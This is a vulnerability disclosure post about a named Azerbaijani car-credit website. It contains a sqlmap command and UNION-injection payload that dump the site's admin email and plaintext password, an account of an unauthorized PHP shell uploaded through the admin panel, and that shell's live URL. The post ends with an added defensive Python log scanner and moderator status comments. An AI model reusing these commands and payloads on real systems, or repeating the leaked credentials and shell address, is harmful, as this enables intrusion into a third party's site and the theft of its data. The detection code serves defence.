Admin page bypass and SQL injection / shell uploaded

Carkredit.az 15 January 2018, 16:06

Detailed information

The site has an SQL injection vulnerability.
Using this weakness, it is possible to steal sensitive information from the site (passwords, site structure, etc.).

[email protected]:~# sqlmap -u http://carkredit.az/az/kurumsal-detay.php?i=1 -D u765618212_cark -T kullanici -C kad,kpasswd --dump
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: i (GET)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: i=1' UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT('qkxzq','MeUyGPiVljpzydkvUNiRMvMWFVkLUpITzwPBcBeR'),'qzzqq')-- VhEt
---
[06:56:56] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.32
back-end DBMS: MySQL 5 (MariaDB fork)
[06:56:56] [INFO] fetching entries of column(s) 'kad, kpasswd' for table 'kullanici' in database 'u765618212_cark'
[06:56:56] [INFO] the SQL query used returns 1 entries
[06:56:56] [INFO] resumed: "[email protected]","adminck"
[06:56:56] [INFO] analyzing table dump for possible password hashes
Database: u765618212_cark
Table: kullanici
[1 entry]
+-------------------+---------+
| kad | kpasswd |
+-------------------+---------+
| [email protected] | adminck |
+-------------------+---------+

When uploading a site image through the admin page / panel, it is possible to upload a shell by changing the file name extension with the Burp Suite tool. Apart from entering panel1, no password is required. A shell was uploaded to the site for test purposes, but the site was not damaged.

Shell address - http://carkredit.az/images/kurumsal/bhp.php
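
For the defender's side of both findings, the following added example (not part of the original report) scans web-server access logs for UNION-based injection in query parameters and for successful requests to PHP files under the image directory. The log lines are constructed, and the function and rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; client IPs use documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jan/2018:06:56:50 +0400] "GET /az/kurumsal-detay.php?i=1 HTTP/1.1" 200 5120
203.0.113.9 - - [15/Jan/2018:06:56:56 +0400] "GET /az/kurumsal-detay.php?i=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20x HTTP/1.1" 200 5310
203.0.113.9 - - [15/Jan/2018:07:10:02 +0400] "POST /images/kurumsal/example.php HTTP/1.1" 200 412
203.0.113.7 - - [15/Jan/2018:07:11:40 +0400] "GET /images/kurumsal/logo.png HTTP/1.1" 200 20480
"""

REQUEST = re.compile(r'^(\S+) .*?"(GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+" (\d{3})')
# UNION ... SELECT after decoding, tolerant of whitespace or SQL comments between keywords.
UNION_SELECT = re.compile(
    r"union(?:\s|/\*.*?\*/)+(?:all(?:\s|/\*.*?\*/)+)?select", re.I | re.S)
# Server-side script extensions have no business under a static image directory.
SCRIPT_IN_IMAGES = re.compile(r"^/images/.*\.(?:php\d?|phtml|phar)(?:/|$)", re.I)


def classify(line):
    """Return a list of (rule, client, detail) findings for one log line."""
    m = REQUEST.match(line)
    if not m:
        return []
    client, _method, target, status = m.groups()
    url = urlsplit(target)
    findings = []
    # parse_qsl percent-decodes names and values, so encoded payloads match too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if UNION_SELECT.search(value):
            findings.append(("sqli-union", client, f"{url.path} param={name}"))
    # Only successful responses matter: a 404 means the script is not there.
    if SCRIPT_IN_IMAGES.search(url.path) and status.startswith("2"):
        findings.append(("script-in-upload-dir", client, url.path))
    return findings


def scan(log_text):
    """Classify every line of a log and return all findings in order."""
    return [f for line in log_text.splitlines() for f in classify(line)]


if __name__ == "__main__":
    for rule, client, detail in scan(SAMPLE_LOG):
        print(f"{rule:22} {client:15} {detail}")
```
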

Comments

  • 06 March 2018, 10:53
    Vulnerability status
    No information received from source

  • 17 January 2018, 09:46
    Vulnerability status
    Sent e-mail to source about vulnerability

  • 16 January 2018, 07:44
    Added point to Vulnerability
    Moderator gave 8 points out of 10 to the vulnerability

  • 16 January 2018, 07:43
    Vulnerability status
    Confirmed by Moderator

  • 15 January 2018, 16:06
    Vulnerability added
    Vulnerability added to BUGemot